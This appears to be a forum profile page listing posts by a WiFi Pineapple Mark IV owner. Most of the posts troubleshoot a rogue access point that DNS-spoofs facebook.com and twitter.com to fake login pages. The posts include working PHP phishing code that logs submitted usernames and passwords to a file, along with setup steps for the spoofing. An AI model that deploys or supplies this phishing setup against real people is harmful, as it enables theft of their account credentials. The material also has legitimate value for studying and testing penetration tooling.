Jump to content

wireless router

Active Members
  • Posts

    5
  • Joined

  • Last visited

Recent Profile Visitors

608 profile views

wireless router's Achievements

Newbie

Newbie (1/14)

  1. I would not recomend the new case. I bought the holiday bundle pack for my first pineapple! :) I have to say I am not to fond of the case. I thought it would be more form fit to the pineapple but its not. trying to hook up the battery pack, cables and usb (unless you bought the usb hak5 recomends) the case is very cramped and doesnt close well. You may also take into account I may not be very good at organizing everything. I would like to be able to just throw everything in it quickly though which is not the case with this case. does anybody else have experience with this case? can include pictures of how theres is packed? those would probably be helpful.
  2. so if I go to facebook.com or twitter.com i get stuck on redirect pages. even after clearing all cache if I goto twitter.com i get redirected to facebook.com/redirect.php with a blank page. here is what my redirect .php looks like <?php $ref = $_SERVER['HTTP_REFERER'];if (strpos($ref, "facebook")) { header('Location: facebook.html'); }if (strpos($ref, "twitter")) { header('Location: twitter.html'); }require('error.php');?> now if i change line 8 "require('error.php');" to an html page of my choosing "require('twitter.html');" i wont get stuck at redirect.php instead it loads twitter.html and keeps the appropriate url "*.com/redirect.php" any clues ???? here is my error.php. <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("/pineapple/logs/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html> and index.php <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html>
  3. This is really frustrating cause its working perfectly from my phone?
  4. Thanks for the quick reply. I tried that setting and am still getting the same errors. plus now I am also getting where the url automatically changes to "https://www.facebook.com" and then times out. If i try twitter it seems to redirect back to facebook and timeout or timesout at https://twitter.com My desktop is still acting the same however and continually redirecting to facebook.com/facebook.html
  5. So just received my pineapple Mark IV recently and was trying to setup phishing and rick roll on it but having some problems. I setup Phishing through these instructions . I started off by formatting a usb drive with ext4 filesystem and following the tutorial to create symbolic links to www. . I placed the phishing files on the flash drive and deleted the original redirect.php since we are using the new phishing one. updated the dns spoof area with "172.16.42.1 *" I also went into configuration and renamed the SSID to "PineApples" with the persistent box check marked. then started the DNS spoof.The problem: I can see the SSID on my android phone. Motorola Razr. connect too it either type in twitter.com or facebook.com and the pineapple will successfully bring me to the facebook.html or twitter.html pages. when i connect through my laptop however ( which is the computer I have been using to setup the pineapple) whenever I type in facebook.com or twitter.com into the url box it seems to get stuck at www.facebook.com/redirect.php. I am looking at a blank page and nothing happens. I have tried disconnecting the ethernet to the pineapple and connecting only via wifi and vice versa with the same results. if this is not confusing enough I then introduced a 3rd desktop computer this 3rd computer did not see the "PineApples" SSID only "other network" I clicked other network and then when asked for network name put in "PineApples" successfully connected and when trying to pull facebook.com or twitter.com I get the same "twitter.com/redirect.php" problem where it loads a blank page and doesnt advance the page to twitter.html. So I type "facebook.com/facebook.html" into the url box and the pineapple introduces the facebook phishing page! continuing my troubleshooting I type twitter.com into the url. it hits the redirect and I am again presented with facebook.com/facebook.html.?? well then I type twitter.com/twitter.html Success!! if only for 2 seconds when it redirected back to facebook.com/facebook.html. well I then try it again on my laptop connected to the pineapple over wifi. try urls twitter.com facebook.com only to be redirected to a blank page with redirect.php in url box. so this time first I try to goto twitter.com/twitter.html. Now it goes to the phishing page redirects back to facebook.com/redirect?? What am I doing wrong?? at some point I setup the Nyan cat and rick roll redirect and got those both working with no problems on all 3 clients. but whenever I try the phishing I seem to run into the redirect problem? what am I doing wrong?? Web Browser: Firefox 17.0.1 Pineapple: Mark IV Laptop OS: Windows 7 64 bit Desktop OS: Windows 7 32 bit Android OS: 4.1.2 If I have left any details out please let me know and I will add them.
×
×
  • Create New...